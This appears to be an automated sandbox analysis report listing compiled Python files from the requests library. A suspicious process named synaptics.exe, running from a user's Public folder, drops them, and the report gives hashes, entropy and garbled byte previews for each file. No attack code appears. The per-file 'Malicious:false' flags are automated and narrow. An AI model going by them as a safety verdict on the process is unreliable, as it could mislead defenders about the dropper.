                                                                                                                                                                                      Preview:o.......?..f.........................@...sL...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y#......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y7......d.Z.Y.n.w.d.d...Z.d.d...Z.z.e.e.j.e.e.....W.n...e.e.f.y`......e...d...e.j.e.e...e.....Y.n.w.z.z.d.d.l.Z.W.n...e.ys......d.Z.Y.n.w.e.e.d.d...s.d.d.l.m.Z...e.......d.d.l.m.Z...e.e.....W.n...e.y.......Y.n.w.d.d.l.m.Z...e...d.e.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m.Z...d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1..d.d.l.m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..e..EeF...Ge.......e.j.d.e4d.d.....d.S.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):518
                                                                                                                                                                                      Entropy (8bit):5.543558804495626
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:CAHUexOsG8ReRyu7msvBXV5b4SazcAFAu63WcJl7Rm7hooookk:tZxdOyqmsvBF5McAFAu6pbV4ek
                                                                                                                                                                                      MD5:F34FAB97167751D0938F0C747B335316
                                                                                                                                                                                      SHA1:3876CA526C774B062CBDCD3481E221FA2B7438D3
                                                                                                                                                                                      SHA-256:9B94A6069FC053D9E79712B463BB0FBC766CCF7666B680908FCFC91ED8143298
                                                                                                                                                                                      SHA-512:3C98F635C9A52E02C8C9A6F2B165BCE84DEF03A7D020DE25776E02F55042F0017B1EFC844D4B9B0A8FCBCB0A48D14C5F38599DE71BCD722A7BD4CF24FAB5CA6E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.32.3i.2..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache-2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__..r....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\__version__.py..<module>....s........................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1594
                                                                                                                                                                                      Entropy (8bit):5.661162738180426
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:tUBUBWmfmQURGWydfvTsNWGioiklxL5VWQ5Ycr1OlX471aNNqagEb/m5Q5lC:tmUBWAmpGWydoNxLEcr1OlX4Ja8me5Q+
                                                                                                                                                                                      MD5:7C00653A65071DE9B419DFD972A56C04
                                                                                                                                                                                      SHA1:B944F10AEF29180778C9DD7C9AFBDE96D4036876
                                                                                                                                                                                      SHA-256:331128DF00D417CE3AADC20B60F393EA2FBCCBEA6B1C26ECA93175458385BB74
                                                                                                                                                                                      SHA-512:48EB8B4FC6CD590DCD22FE0C1A6ABCC127A9C69A10F46EBA07A8D3B947A4E7875F37456E9862F693B9229373A13404154ADE73E3F8EFAA59CCD01CF6772FC35E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...sr...d.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e.e.f.Z.e.e.f.Z.e.e.e.e.i.Z.d.d.d...Z.d.d...Z.d.S.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$..asciic....................C...s ...t.|.t...r.|.}.|.S.|...|...}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..out..r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\_internal_utils.py..to_native_string....s..............r....c....................C...s4...t.|.t...s.J...z.|...d.....W.d.S...t.y.......Y.d.S.w.).z.Determine if unicod
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22008
                                                                                                                                                                                      Entropy (8bit):5.431370530692121
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:YmMszG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:50TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                      MD5:3399C8238984D5327D85C8514EBF3E0E
                                                                                                                                                                                      SHA1:BA008396D022AB563CE4494369AC06B457CE0F97
                                                                                                                                                                                      SHA-256:546D7CDD90BAEB35E9112585C645C0126E88F05257BA7C398F5012BB8822DC64
                                                                                                                                                                                      SHA-512:E57338E05C00F38F5B551CE94970FDF31F05B7856499B5C1F0791C7BE433D4ED01A8E6F31CCF2B43B682C7E62CE03E0FED1A8094F5F0DA0DA74A63FBF20D70CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6694
                                                                                                                                                                                      Entropy (8bit):5.146271398526042
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:s4kMfrO7AyGLluXW87ZolNAzj8t8JYat9DMGm6RGmOsGmfiC:wMDY7EeZjM88eRys2C
                                                                                                                                                                                      MD5:BC1A743CA5485B370EA176DC578855E4
                                                                                                                                                                                      SHA1:425CAC341512B87891826546C8901B8BD383FDD1
                                                                                                                                                                                      SHA-256:E7072750792C3C21F880A3B80F2CB52BC0B15B823B5386E07D194CBB5591EFDE
                                                                                                                                                                                      SHA-512:B21FBE488217CCB3A3092989ACB324D1551E97344CF27FFCA0CFAAE1F8F1857F6B95C64DDE61BBEC2C342E0AC1567F14B2A43440947F0F567939CF925E016023
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f1........................@...s\...d.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc....................K...sB...t.......}.|.j.d.|.|.d...|.....W...d.........S.1.s.w.......Y...d.S.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to se
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8090
                                                                                                                                                                                      Entropy (8bit):5.488935587177655
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:5B07m1AjzLPVCFA1PCGLcBCJI1W22VjwTrhhbVYy:X07m1iVCOPCGLRWW22aTNhl
                                                                                                                                                                                      MD5:BE74449D59E06D7018FC0475CDFEAFBD
                                                                                                                                                                                      SHA1:510D878316BA1826A214B8F9548A26C53FC350D5
                                                                                                                                                                                      SHA-256:61C26C8289F3A92ABA57A92AD86E4657E0E8E943BA1DCE45E549A6AEFB0D7801
                                                                                                                                                                                      SHA-512:92B737A5C983ABD6778AEE7BE8BE31DFF564E72F53BCE1B8A479715AEB2283A112B929E7F9BF19EAEC5BBD6FB80C64C4BD99F5B74611F3A89B582C1A4DDC0952
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.'.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac....................C...s....t.|.t...s.t.j.d...|...t.d.....t.|...}.t.|.t...s(t.j.d...t.|.....t.d.....t.|...}.t.|.t...r2|...d...}.t.|.t...r<|...d...}.d.t.t.d...|.|.f.............}.|.S.).z.Returns a Basic Auth string.z.Non-string usernames will no longer be supported in Requests 3.0.0. Please convert the object you've passed in ({!r}) to a string or bytes object in the near future to avoid problems.)...categoryz.Non-string passwords will no longer be supported in Requests 3.0
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):595
                                                                                                                                                                                      Entropy (8bit):5.301750884907586
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:CA67OBe1A3Dj4uIy1XfB4A4kvYa4Zk3S2sUCc011Tl7RUcENM:t6jgbXKAhwa93DRCRpVZ
                                                                                                                                                                                      MD5:5E21190694AD00065397BB4B7056DEFC
                                                                                                                                                                                      SHA1:4362E1C2071D64DECD506BB372B8642C57245B71
                                                                                                                                                                                      SHA-256:88E7381FED1997431F3E1B9275AA92790348E0DC7FEEAF756689A40AD0413416
                                                                                                                                                                                      SHA-512:40F1A4CFA558827F60B025DBD27A6DA034C5675FBD1044294F497C1BCDC9A6C2E771F47975AB2697297F4C956D056F74578434832864D3D1D31F9E921B973E14
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s*...d.Z.d.d.l.m.Z...e.d.k.r.e.e.......d.S.d.S.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......)...where..__main__N)...__doc__Z.certifir......__name__..print..r....r.....@C:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\certs.py..<module>....s..............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1746
                                                                                                                                                                                      Entropy (8bit):5.60231557414537
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:tNAUIkbGXHyOLyRJV79C9lKPV+5MTYGi4k0b8+:nR8XyUyRJJ98KPV+5f4kI
                                                                                                                                                                                      MD5:E3471661AC85A96390EB51C0769EE23D
                                                                                                                                                                                      SHA1:8F2AD0FDBCF1F37A1512B3136B9917B841B73AAE
                                                                                                                                                                                      SHA-256:0CE48FE6A1922C8DD92ED3108D3D634ECA1B75302B1531A322DF4E6368ED9129
                                                                                                                                                                                      SHA-512:AE8E69BC8DB41207441826023A47803104A53E1E6976E9B34F8386702710001BD31A11B40472DCF3398C9AE4AC39AF73819F6EE0BEFECB750F60D063CF58911A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e...Z.e.j.Z.e.d...d.k.Z.e.d...d.k.Z.d.Z.z.d.d.l.Z.d.Z.W.n...e.y7......d.d.l.Z.Y.n.w.e.rAd.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'm(Z(m)Z)m*Z*m+Z+..e,Z-e,Z,e.Z.e,e.f.Z/e0e1f.Z2e0f.Z3d.S.).z..requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.......Nc....................C...s<...d.}.d.D.].}.|.d.u.r.z.t...|...}.W.q...t.y.......Y.q.w.q.|.S.).z-Find supported character detection libraries.N)...chardet..charset_normalizer)...importlib..import_module..ImportError).r......lib..r.....AC:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\compat.py.._resolve_char_detection....s........................r..............FT)...JSONDecodeError)...OrderedDict)...Callable..Mapping..M
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18689
                                                                                                                                                                                      Entropy (8bit):5.258680165123524
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:lEvXh4n08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:lEvXh4n08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                      MD5:866C6DC11B93AAC8A8740A8140578745
                                                                                                                                                                                      SHA1:99883F789060ED7F17FB5EB315C2FCFC81D6E086
                                                                                                                                                                                      SHA-256:8CFDC300C202F9DE40CEBDC0D0F96ED897F5D8FA591136656414CBD80187E43F
                                                                                                                                                                                      SHA-512:0A559947748D592A56B148A0088581E13C8E1514B5FBF3AADB200EA288C7F4A962808317625725C60FB22347338A26755EBEE55F26F8DDE37F27F92ED258C5C5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6197
                                                                                                                                                                                      Entropy (8bit):4.921771915371752
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:KIrpcOB6P/5IldtEEJiCr6dNtQlrnlGkh98RZR1YgvOHwXx:frpwxIlv/JPr6OgH2Qh
                                                                                                                                                                                      MD5:AAF6B3115D9B4FD37A3BF9278B05A461
                                                                                                                                                                                      SHA1:C16733B7E19A3CAEBFBED19291BDF9AD6A2EBA01
                                                                                                                                                                                      SHA-256:40A1AC99656A83B9451C232700DF3DCEF747EC78B3A4C79AC0181228C598C861
                                                                                                                                                                                      SHA-512:9C5C0171F8EF75D68DCB79EE26C71858617F842E0F11C719A95E7C09E5FF6D5F29FEDE816351B3E7DC70AFADC66D32E31C7114361A30AADC6873D316D702A30A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):962
                                                                                                                                                                                      Entropy (8bit):5.240557336257205
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:tgSx1qlJ5pMUqTDP/+/k+VmY+qnvWZ3b1e7N:tuRyDPGEYxS3bUx
                                                                                                                                                                                      MD5:C0B11482D2ABEABCF2BE6C42973C490C
                                                                                                                                                                                      SHA1:616AD5EF2B62D0EF74515743430261C3F498ABD7
                                                                                                                                                                                      SHA-256:04549BD27DCD27DDDAA13004959E1D6CCD7FA2A39C5EB34E71CF67D18B85DE9C
                                                                                                                                                                                      SHA-512:C58F45C981347748192C958878BB8D03BEF466E5FE5F036E7A10EB0281181445204209FC8053BAE5DFFD8A1933FAA36B927BC79953898FDF71444EC7B0F70265
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s....d.Z.d.g.Z.d.d...Z.d.d...Z.d.S.).z..requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request....responsec....................C...s....d.d...t.D...S.).Nc....................S...s....i.|.].}.|.g...q.S...r....)....0..eventr....r.....@C:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\hooks.py..<dictcomp>....s......z!default_hooks.<locals>.<dictcomp>)...HOOKSr....r....r....r......default_hooks....s......r....c....................K...sP...|.p.i.}.|...|...}.|.r&t.|.d...r.|.g.}.|.D.].}.|.|.f.i.|.....}.|.d.u.r%|.}.q.|.S.).z6Dispatches a hook dictionary on a given piece of data...__call__N)...get..hasattr)...key..hooksZ.hook_data..kwargs..hookZ._hook_datar....r....r......dispatch_hook....s..........................r....N)...__doc__r....r....r....r....r....r....r......<module>....s............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24184
                                                                                                                                                                                      Entropy (8bit):5.464359982385349
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:+34ngR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:+3t6Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                      MD5:C9C606E464478D11F82893E4A61B0EC6
                                                                                                                                                                                      SHA1:14E284FECC214D67E211AF6A2707B88EE714C6B6
                                                                                                                                                                                      SHA-256:E0632E8135612EAE8FF9CFA0068468549FEA2443B1C481662E1671BF4CC97302
                                                                                                                                                                                      SHA-512:034BF5E4199357249B97F90A81A0BF542FFC0823E70AA988992626C994CA2FD55D21D3CECD4B33ADCE3FEEBE3D149B8EEFD1DF43E7709174B9515CD70843ECA5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..fZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):599
                                                                                                                                                                                      Entropy (8bit):5.47645396399439
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:CAcGzQ2Z1N6EzEq+sH5MWR6hxtRHV/bCJHRi/uelmXifqI0I9IGm+l7RhCUV/X:tdwnq+sHIztRERi/uAfz3pmuVhCmX
                                                                                                                                                                                      MD5:FC966030A7AB0E4C2E3112953C0F6F46
                                                                                                                                                                                      SHA1:261CE9108202CBFA012E83D3134FC5429A44F25B
                                                                                                                                                                                      SHA-256:ADE0465D688314862E7D54343F9B3CA9E18DC826B36A32F73E29626F59E6BD2D
                                                                                                                                                                                      SHA-512:578F7F9E4AF0939622275885C177876899BDCDE530A09EF5B6F43DC1EA0C94211745437B8CF1B2467409E14AA655DDCD7BC800758589FDD1F1A64826E469B93F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s....d.d.l.Z.d.d.l.m.Z...d.D.](Z.e.e...e...e.<.e.e.j...D.].Z.e.e.k.s(e...e...d.....r3e.j.e...e.j.d.e.....<.q.q.e.d.u.rke.j.Z.e.e.j...D.]+Z.e.e.k.sOe...e...d.....rje.j.e...Z.e.e.j.d.e.....<.e...e.d...Z.e.e.j.d.e.....<.qAd.S.d.S.)......N.....)...chardet)...urllib3..idna...z.requests.packages.r....)...sys..compatr......package..__import__..locals..list..modules..mod..startswith..__name__..targetZ.imported_mod..replace..r....r.....CC:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\packages.py..<module>....s(...........................................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):19692
                                                                                                                                                                                      Entropy (8bit):5.466593235194196
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:rKLx6UqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:OFlGFHRjW2c/n8b
                                                                                                                                                                                      MD5:5970B41FF89E4C116D216E401A439DC6
                                                                                                                                                                                      SHA1:243DF8815E3859840F096406B7EF7216B284CE80
                                                                                                                                                                                      SHA-256:824A1D830ABFDE80DB0D53F7FF09F6873CC85B21E2D08CEFEEBE038AFFA4982D
                                                                                                                                                                                      SHA-512:F0845AE668D2570A7516FD7A137B2CC4CDB88E6F8D9B7F77F1D0A7CB7D44267FD1EBCA1ECF35CFD477189A3D1206F50A0B81F1711C64E0518F8270CC410BF58A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4712
                                                                                                                                                                                      Entropy (8bit):5.738145194782349
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:m+vEE3B8QaXQ/aMZaSUp8DuaiCSu6woOXRAdeMO2F4K1r7w:mWn3WKfr/piTNg+eUFs
                                                                                                                                                                                      MD5:C9B79415EDC3407735BD190C822E7AA8
                                                                                                                                                                                      SHA1:3DDC6141DF9B6DDEBE405F6827D36FDD590565B4
                                                                                                                                                                                      SHA-256:20644D576B7DE439DA6141B6E17E4601D37EF335D6BD2C8584565B320F9B8FCC
